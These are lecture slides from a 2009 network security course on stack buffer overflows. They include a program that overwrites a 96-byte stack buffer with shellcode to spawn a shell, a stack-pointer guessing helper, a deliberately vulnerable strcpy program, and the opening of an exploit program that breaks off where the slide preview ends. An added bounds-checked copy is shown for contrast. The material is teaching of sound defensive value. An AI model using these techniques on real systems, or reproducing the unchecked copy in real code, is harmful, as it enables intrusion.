CSCI6268L31 - Foundations of Network and Computer Security...

Foundations of Network and Computer Security
John Black
Lecture #31, Nov 16th 2009
CSCI 6268/TLEN 5550, Fall 2009

Ok, We’re Done? Well…
- We have zero-less shell code
- It is relocatable
- It spawns a shell
- We just have to get it onto the stack of some vulnerable program!
- And then we have to modify the return address in that stack frame to jump to the beginning of our shell code… ahh…
- If we know the buffer size and the address where the buffer sits, we’re done (this is the case when we have the code on the same OS sitting in front of us)
- If we don’t know these two items, we have to guess…
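If we know where the buffer is

```c
#include <string.h>

char shellcode[] = . . .   /* elided on the slide */
char large_string[128];

void main() {
    char buffer[96];
    int i;
    long *long_ptr = (long *) large_string;

    /* fill large_string with 32 copies of buffer's address */
    for (i = 0; i < 32; i++)
        *(long_ptr + i) = (int) buffer;

    /* place the shell code at the start of large_string */
    for (i = 0; i < strlen(shellcode); i++)
        large_string[i] = shellcode[i];
    large_string[i] = '\0';

    /* unchecked copy into the 96-byte stack buffer */
    strcpy(buffer, large_string);
}
// This works: ie, it spawns a shell
```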

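Otherwise, how do we Guess?
- The stack always starts at the same (high) memory address
- Here is sp.c:

```c
#include <stdio.h>

/* Returns the current stack pointer: on 32-bit x86 the value left in
   %eax is what the caller sees as the return value. */
unsigned long get_sp(void) {
    __asm__("movl %esp,%eax");
}

void main() {
    printf("0x%lx\n", get_sp());
}
```

```
$ ./sp
0x8000470
$
```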
vulnerable.c

```c
#include <string.h>

void main(int argc, char *argv[]) {
    char buffer[512];

    /* no length check: argv[1] may be longer than buffer */
    if (argc > 1)
        strcpy(buffer, argv[1]);
}
```

- Now we need to inject our shell code into this program
- We’ll pretend we don’t know the code layout or the buffer size
- Let’s attack this program

exploit1.c

```c
void main(int argc, char *argv[]) {
    if (argc > 1) bsize = atoi(argv[1]);
    if (argc > 2) offset = atoi(argv[2]);
    buff = malloc(bsize);
    addr = get_sp() - offset;
    printf("Using address: 0x%x\n", addr);
    ptr = buff;
    /* the slide preview ends here */
```
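For contrast with vulnerable.c above, an added example (not code from the lecture): the slide's unchecked strcpy() pattern beside a bounds-checked copy that rejects oversized input instead of writing past the 512-byte buffer. The helper names copy_unchecked, copy_checked and handle_arg are hypothetical.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 512   /* same size as buffer[] in vulnerable.c */

/* The slide's pattern: strcpy() copies until the NUL in src and ignores
 * the size of dst. Shown for comparison only; never called below. */
void copy_unchecked(char *dst, const char *src) {
    strcpy(dst, src);
}

/* Hardened form (hypothetical helper): refuse any input that does not
 * fit, terminating NUL included, rather than truncating silently.
 * Returns 0 on success, -1 on NULL arguments or oversized input. */
int copy_checked(char *dst, size_t dst_size, const char *src) {
    const char *nul;
    size_t len;

    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    nul = memchr(src, '\0', dst_size);  /* look at most dst_size bytes in */
    if (nul == NULL)                    /* no NUL in range: does not fit */
        return -1;
    len = (size_t)(nul - src);
    memcpy(dst, src, len + 1);          /* len + 1 <= dst_size */
    return 0;
}

/* Replacement body for vulnerable.c's main(): 0 = accepted, 1 = rejected. */
int handle_arg(const char *arg) {
    char buffer[BUF_SIZE];

    if (copy_checked(buffer, sizeof buffer, arg) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return 1;
    }
    return 0;
}

int main(int argc, char *argv[]) {
    return (argc > 1) ? handle_arg(argv[1]) : 0;
}
```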

This note was uploaded on 03/11/2010 for the course CS 6268 taught by Professor Black during the Spring '09 term at University of Colombo.
